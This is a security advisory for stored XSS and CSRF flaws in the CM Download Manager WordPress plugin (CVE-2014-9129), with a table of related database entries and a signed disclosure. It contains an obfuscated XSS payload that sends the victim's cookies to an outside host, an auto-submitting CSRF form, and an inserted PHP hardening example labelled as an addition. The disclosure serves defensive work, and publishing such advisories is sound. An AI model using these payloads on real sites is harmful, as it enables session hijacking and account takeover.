| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2014-9129 | 5 Dec 2014 15:00 | – | cve |
| CVE-2014-9129 | 5 Dec 2014 15:00 | – | cvelist |
| EUVD-2014-8954 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2014-9129 | 5 Dec 2014 15:59 | – | nvd |
| WordPress Download Manager Plugin <= 2.0.6 - Multiple CSRF and XSS | 28 Nov 2014 00:00 | – | patchstack |
| Cross site request forgery (csrf) | 5 Dec 2014 15:59 | – | prion |
| PT-2014-8839 · Creative Mind · Cm Download Manager | 5 Dec 2014 00:00 | – | ptsecurity |
| CVE-2014-9129: XSS and CSRF in CM Download Manager plugin for WordPress | 22 Dec 2014 00:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 22 Dec 2014 00:00 | – | securityvulns |
| CM Download Manager < 2.0.7 - CSRF to Cross-Site Scripting | 16 Jan 2015 00:00 | – | wpvulndb |
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Product: WordPress plugin cm-download-manager
Plugin page: https://wordpress.org/plugins/cm-download-manager/
Vendor: CreativeMindsSolutions http://cminds.com/
Vulnerability Type: CWE-79: Cross-site scripting
Vulnerable Versions: 2.0.6 and below
Fixed Version: 2.0.7
Solution Status: Fixed by Vendor
Vendor Notification: 2014-11-27
Public Disclosure: 2014-12-02
CVE Reference: N/A. Only assigned for CSRF
Criticality: Low
Vulnerability details:
CM Download Manager plugin for WordPress contains a flaw that allows a stored
cross-site scripting (XSS) attack. This flaw exists because the
/wp-admin/admin.php script does not validate input to the 'addons_title' POST
parameter before returning it to users. This allows an authenticated remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship between
their browser and the server.
Root cause:
The software incorrectly neutralizes user-controllable input before it is placed
in output that is used as a web page that is served to authenticated users.
Proof-of-concept:
Insert the following code into the CM Downloads -> Settings -> "Downloads listing title" field (delivered through the CSRF attack described in the second part of this advisory):

```html
<script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110,
101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116,
116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107,
105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109,
101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105,
112, 116, 62);document.write(foo);</script>
```

---------------
Product: WordPress plugin cm-download-manager
Plugin page: https://wordpress.org/plugins/cm-download-manager/
Vendor: CreativeMindsSolutions http://cminds.com/
Vulnerability Type: CWE-352: Cross-Site Request Forgery
Vulnerable Versions: 2.0.6 and below
Fixed Version: 2.0.7
Solution Status: Fixed by Vendor
Vendor Notification: 2014-11-27
Public Disclosure: 2014-12-02
CVE Reference: CVE-2014-9129
Criticality: Low
Vulnerability details:
CM Download Manager plugin for WordPress contains a flaw on the
CMDM_admin_settings page because HTTP requests to /wp-admin/admin.php do not
require multiple steps, explicit confirmation, or a unique token when performing
sensitive actions. By tricking an authenticated user into following a specially
crafted link, a context-dependent attacker can perform a CSRF attack that causes
the victim to insert and execute arbitrary script code.
Root cause:
The web application does not sufficiently verify whether a well-formed, valid,
consistent request was intentionally provided by the user who submitted the
request.
Proof-of-concept:

```html
<html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3>
<form id="f1" method="POST"
action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings">
<table><input type="text" name="addons_title" value="XSS"></table></form>
<script type="text/javascript">document.getElementById("f1").submit();</script>
</body></html>
```
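As an added, defender-side illustration that is not part of the advisory or of the plugin's own code, the following sketches how a WordPress admin settings handler addresses both root causes named above: the nonce field and the `check_admin_referer()` call tie the request to the submitting user's session (CWE-352), and `sanitize_text_field()`, `esc_attr()` and `esc_html()` neutralize the title before it is stored and again when it is rendered (CWE-79). The `cmdm_hardened_*` and `cmdm_example_*` names, the option key and the text domain are assumptions made for this example; the WordPress API functions used are real.

```php
<?php
/*
 * Added example (not the plugin's code): a hardened handler for the
 * "Downloads listing title" setting. The cmdm_hardened_* / cmdm_example_*
 * names, the option key and the text domain are assumptions.
 */

// Render the settings form. wp_nonce_field() embeds a per-user, time-limited
// token that a page on another origin cannot know (CWE-352 mitigation).
function cmdm_hardened_render_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You do not have permission to view this page.', 'cmdm-example' ) );
    }
    $title = get_option( 'cmdm_example_addons_title', '' );
    ?>
    <div class="wrap">
        <h1><?php echo esc_html__( 'CM Downloads Settings', 'cmdm-example' ); ?></h1>
        <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=CMDM_admin_settings' ) ); ?>">
            <?php wp_nonce_field( 'cmdm_example_save_settings', 'cmdm_example_nonce' ); ?>
            <label for="addons_title"><?php esc_html_e( 'Downloads listing title', 'cmdm-example' ); ?></label>
            <!-- esc_attr() neutralizes the stored value before it lands in an attribute (CWE-79 mitigation) -->
            <input type="text" id="addons_title" name="addons_title" value="<?php echo esc_attr( $title ); ?>">
            <?php submit_button(); ?>
        </form>
    </div>
    <?php
}

// Handle the POST. Hooked to admin_init so it runs before any output is sent.
function cmdm_hardened_save_settings() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['addons_title'] ) ) {
        return;
    }
    // Abort unless the nonce is present and valid for this user and action.
    // check_admin_referer() calls wp_die() on failure, which stops a forged
    // cross-site form submission such as the one in the proof-of-concept.
    check_admin_referer( 'cmdm_example_save_settings', 'cmdm_example_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient privileges.', 'cmdm-example' ) );
    }

    // Remove the slashes WordPress adds to request data, then sanitize: tags are
    // stripped and whitespace normalized, so a <script> payload is never stored.
    $title = sanitize_text_field( wp_unslash( $_POST['addons_title'] ) );
    update_option( 'cmdm_example_addons_title', $title );
}
add_action( 'admin_init', 'cmdm_hardened_save_settings' );

// Output of the stored title on the listing page: escape again at the point of
// use even though the value was sanitized on input (defense in depth).
function cmdm_hardened_listing_title_html() {
    $title = get_option( 'cmdm_example_addons_title', '' );
    return '<h2 class="cmdm-listing-title">' . esc_html( $title ) . '</h2>';
}
```

With this handler in place the proof-of-concept form above fails at `check_admin_referer()` because it carries no valid `cmdm_example_nonce`, and even a legitimately submitted value containing markup is reduced to plain text before it reaches the database or the page.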
Notes:
Other pages and/or parameters are possibly insecure as well (not tested). A
proper security audit of the software is suggested. The vendor did not mention
the security fix or the CVE in the ChangeLog even though it was discussed several
times. References below.
Cross-site scripting:
http://cwe.mitre.org/data/definitions/79.html
https://scapsync.com/cwe/CWE-79
https://en.wikipedia.org/wiki/Cross-site_scripting
Cross-Site Request Forgery:
http://cwe.mitre.org/data/definitions/352.html
https://scapsync.com/cwe/CWE-352
https://en.wikipedia.org/wiki/Cross-site_request_forgery

---
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/
l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT
=bUVi
-----END PGP SIGNATURE-----